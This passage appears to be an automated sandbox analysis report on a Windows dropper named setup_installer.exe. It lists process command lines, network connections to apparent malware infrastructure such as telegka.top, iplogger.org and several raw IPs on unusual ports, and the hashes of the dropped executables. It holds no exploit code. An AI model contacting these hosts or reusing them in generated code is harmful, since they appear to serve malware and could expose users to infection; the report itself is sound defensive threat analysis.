"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5416,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5572,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5588 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4600 -ip 4600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1204

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3744,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3892 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3516,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3972,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3512 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3444,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3892,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3468 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=2008,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3980 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3912,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=1928,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4600 -ip 4600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1552

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 sayanu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 telegatt.top udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
N/A 127.0.0.1:52086 tcp
N/A 127.0.0.1:52088 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 gcl-gb.biz udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.180.10:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
NL 194.104.136.5:46013 tcp
GB 142.250.180.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.187.206:443 play.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 telegatt.top udp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.213.58.216.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegka.top udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 21.138.155.104.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 104.155.138.21:80 telegka.top tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 82.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 107.178.223.183:80 telegka.top tcp
FI 135.181.129.119:4805 tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 06c46fe375c6748c533c881346b684d1
SHA1 cb488c5b5f58f3adaf360b0721e145f59c110b57
SHA256 07cf30eb7de3a5626ce499d5efdeba147c3c5bd40686cfc8727b4da7f9ab7d1a
SHA512 bdf582b78bc5ef135260f7c93119ef315cc08836d9864014951bc6fe919e33ca3184828c70e6ab43b70730bd191a511112a088968abf03bbe4a5e17cb4276443

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe

MD5 ba794724c566766d57e2aee175cde54a
SHA1 401fb41eaf42791c66738f460009ba00f7cdd913
SHA256 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6
SHA512 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1460-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-86-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1460-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1460-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1460-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1124-87-0x0000000004A30000-0x0000000004A66000-memory.dmp

memory/1460-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4504-88-0x0000000004D40000-0x0000000005368000-memory.dmp

memory/1460-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1460-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-78-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-76-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1460-75-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1460-74-0x0000000000EB0000-0x0000000000F3F000-memory.dmp

memory/1460-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1460-72-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/1124-135-0x0000000005AD0000-0x0000000005E24000-memory.dmp

memory/4684-148-0x0000000000AB0000-0x0000000000B20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/3840-156-0x00000000008C0000-0x00000000008C6000-memory.dmp

memory/3840-153-0x0000000000130000-0x0000000000148000-memory.dmp

memory/3956-149-0x00000000005E0000-0x00000000005E8000-memory.dmp

memory/1768-147-0x0000000005380000-0x000000000539E000-memory.dmp

memory/2040-140-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1768-145-0x0000000005400000-0x0000000005476000-memory.dmp

memory/1768-144-0x0000000000C10000-0x0000000000C82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogspjjud.lh5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4504-113-0x00000000053E0000-0x0000000005446000-memory.dmp

memory/4504-112-0x0000000005370000-0x00000000053D6000-memory.dmp

memory/4504-110-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-ETQOM.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1144-157-0x0000000000090000-0x0000000000100000-memory.dmp

memory/1768-167-0x0000000005C30000-0x00000000061D4000-memory.dmp

memory/2820-174-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2040-176-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1124-177-0x0000000004D10000-0x0000000004D2E000-memory.dmp

memory/2092-172-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1124-180-0x0000000006050000-0x000000000609C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OTIBH.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1460-199-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1460-200-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1460-198-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-197-0x000000006FE40000-0x000000006FFC6000-memory.dmp

